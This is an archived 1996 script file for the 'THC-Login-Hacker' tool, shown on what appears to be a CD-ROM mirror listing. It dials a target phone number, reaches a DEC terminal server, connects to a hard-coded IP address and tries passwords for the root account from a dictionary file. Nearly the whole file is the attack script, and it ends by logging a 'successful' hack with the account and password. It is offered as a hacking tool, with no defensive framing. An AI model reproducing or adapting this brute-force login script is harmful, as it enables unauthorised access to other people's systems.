home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / THC-LH10.ZIP / DEC-SERV.TXT < prev    next >
Text File  |  1996-03-19  |  2KB  |  122 lines

  1. ;
  2. ;
  3. ; ----------------------------------------------------------------------
  4. ;  Dec-Telnet-Platform  Script  for THC-Login-Hacker v0.9ß  (by Tron X)
  5. ; ----------------------------------------------------------------------
  6. ;
  7. ;
  8. ;
  9. #DEFINE
  10. init_modem=z
  11. init_data=8n1
  12. LOGFILE=xxxxxx.log
  13. PHONE_NR=xxxxxx
  14. DIAL_TRIES=0
  15. LOGIN_TRIES=0
  16. DIC(1)=D:\hackusr\dictbig.txt
  17. ;dic(2)=d:\hackusr\bigdict2.txt
  18. ;dic(3)=d:\hackusr\bigdict3.txt
  19.  
  20. #NOCARRIER
  21. LOG(NO CARRIER)
  22. LOG(ON $DATE $TIME)
  23. LOG(AT $DIC(1))
  24. LOG(returning ...)
  25. GOTO(#START)
  26.  
  27. #START
  28. HANGUP
  29. LOG_SESSION_ON
  30. LOG()
  31. log()
  32. log( HaCK ATTeMPT STaRTeD ......)
  33. log()
  34. log(  TaRGeT: $PHONE_NR )
  35. log(    DaTe: $DATE )
  36. log(    TiMe: $TIME)
  37. log()
  38. log()
  39. log( ......DiaLiNG)    
  40. dial
  41. log()
  42. log( ......CoNNeCTeD!)
  43. log()
  44. log()
  45. wait(5)
  46. :1
  47. wait4string(1,^M,5,goto(#start),sername>)
  48. send(fh65)
  49. :2
  50. wait4string(1,^M,5,goto(#start),ocal>)
  51. send(connect 189.25.56.7)
  52. :3
  53. if string~sconnected then goto(2)
  54. if string~ncorrect then goto(3)
  55. wait4string(1,^C,5,goto(4),ogin:)
  56. send(root)
  57. if string~sconnected then goto(2)
  58. if string~ncorrect then goto(3)
  59. :4
  60. if string~sconnected then goto(2)
  61. if string~ncorrect then goto(3)
  62. wait4string(1,^D,5,goto(4),assword:)
  63. send_next_dic(1)
  64. if string~sconnected then goto(2)
  65. if string~ncorrect then goto(3)
  66. :5
  67. if string~sconnected then goto(2)
  68. if string~ncorrect then goto(3)
  69. :6
  70. wait(1)
  71. if string~sconnected then goto(2)
  72. if string~ncorrect then goto(3)
  73. wait(1)
  74. if string~sconnected then goto(2)
  75. if string~ncorrect then goto(3)
  76. wait(1)
  77. if string~sconnected then goto(2)
  78. if string~ncorrect then goto(3)
  79. wait(1)
  80. if string~sconnected then goto(2)
  81. if string~ncorrect then goto(3)
  82. wait(1)
  83. if string~sconnected then goto(2)
  84. if string~ncorrect then goto(3)
  85. wait(1)
  86. if string~sconnected then goto(2)
  87. if string~ncorrect then goto(3)
  88. wait(1)
  89. if string~sconnected then goto(2)
  90. if string~ncorrect then goto(3)
  91. wait(1)
  92. if string~sconnected then goto(2)
  93. if string~ncorrect then goto(3)
  94. wait(1)
  95. if string~sconnected then goto(2)
  96. if string~ncorrect then goto(3)
  97. :7
  98. beep
  99. beep
  100. beep
  101. beep
  102. beep
  103. beep
  104. beep
  105. beep
  106. beep
  107. log()
  108. log()
  109. log()
  110. Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
  111. log()
  112. log(  TaRGeT: $PHONE_NR   DaTe: $DATE  TiMe: $TIME)
  113. log()
  114. log()
  115. log()
  116. log(        ACCouNT: root)
  117. log(       PaSSWoRD: DIC(1))
  118. log()
  119. log()
  120. log()
  121. #END
  122.